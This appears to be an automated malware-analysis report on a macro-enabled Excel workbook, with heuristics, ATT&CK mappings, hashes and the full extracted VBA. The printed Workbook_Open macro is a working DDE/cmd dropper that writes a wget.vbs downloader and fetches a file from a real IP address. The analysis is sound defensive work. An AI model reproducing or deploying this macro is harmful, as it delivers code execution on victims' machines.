MALICIOUS
Risk Score: 170
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The OOXML file contains a Workbook_Open VBA macro that leverages a DDE link to execute a command. This command uses 'cscript' to run a downloaded 'wget.vbs' script, which in turn downloads a file from 'http://180.148.84.85/test.txt' and saves it as 'test.txt'. This indicates downloader or dropper functionality, aiming to fetch and execute further malicious content.
Heuristics (6)

- Spreadsheet DDE link launches a dangerous command (critical, OOXML_SPREADSHEET_DDE_MALICIOUS): Excel workbook contains an externalLinks/ddeLink entry whose ddeService/ddeTopic launches a dangerous executable. This is SpreadsheetML DDE command execution, distinct from WordprocessingML DDE field instructions.
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project (VBA macros present).
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched lines in script:

  ```vb
  ActiveCell.FormulaR1C1 = "=cmd|'/C echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs && echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs && echo Err.Clear >> wget.vbs'!'A1'"
  ActiveCell.FormulaR1C1 = "=cmd|'/C echo Set http = Nothing >> wget.vbs && echo Set http = CreateObject(""WinHttp.WinHttpRequest.5.1"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""WinHttp.WinHttpRequest"") >> wget.vbs'!'A1'"
  ActiveCell.FormulaR1C1 = "=cmd|'/C echo If http Is Nothing Then Set http = CreateObject(""MSXML2.ServerXMLHTTP"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""Microsoft.XMLHTTP"") >> wget.vbs'!'A1'"
  ```

- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched lines in script:

  ```vb
  Attribute VB_Name = "Module1"
  Private Sub Workbook_Open()
  Attribute Workbook_Open.VB_ProcData.VB_Invoke_Func = "j\n14"
  ```

- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://180.148.84.85/test.txt, in document text (OOXML body / shared strings)
  - http:///test.txt, in document text (OOXML body / shared strings)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2988 bytes |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 41984 bytes |

SHA-256 (macros.bas): 80da8d74fcfa3746c365a0e52a5a33a192e830c0fdf876fefcc4add1fa699ecc
SHA-256 (vbaProject_00.bin): d4d745a79c0fba985ce214a37a687b93ca88b7754d42146d23f219cd68fa5c9d

Preview of macros.bas (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Module1"
Private Sub Workbook_Open()
Attribute Workbook_Open.VB_ProcData.VB_Invoke_Func = "j\n14"
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
ActiveCell.FormulaR1C1 = "=cmd|'/C echo strUrl = WScript.Arguments.Item(0) > wget.vbs && echo StrFile = WScript.Arguments.Item(1) >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs && echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs && echo Err.Clear >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo Set http = Nothing >> wget.vbs && echo Set http = CreateObject(""WinHttp.WinHttpRequest.5.1"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""WinHttp.WinHttpRequest"") >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo If http Is Nothing Then Set http = CreateObject(""MSXML2.ServerXMLHTTP"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""Microsoft.XMLHTTP"") >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo http.Open ""GET"",strURL,False >> wget.vbs && echo http.Send >> wget.vbs && echo varByteArray = http.ResponseBody >> wget.vbs && echo Set http = Nothing >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo Set fs = CreateObject(""Scripting.FileSystemObject"") >> wget.vbs && echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs && echo strData = "" >> wget.vbs && echo strBuffer = "" >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs && echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs && echo Next >> wget.vbs && echo ts.Close >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C cscript wget.vbs http:///test.txt test.txt '!'A1'"
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module2"
Sub test()
Attribute test.VB_ProcData.VB_Invoke_Func = "j\n14"
s
End Sub
Attribute VB_Name = "Module3"
Sub testest()
Attribute testest.VB_ProcData.VB_Invoke_Func = " \n14"
'
' testest Macro
'
'
Range("J18").Select
ActiveCell.FormulaR1C1 = "asd"
Range("K18").Select
ActiveCell.FormulaR1C1 = "asd"
Range("K19").Select
End Sub
```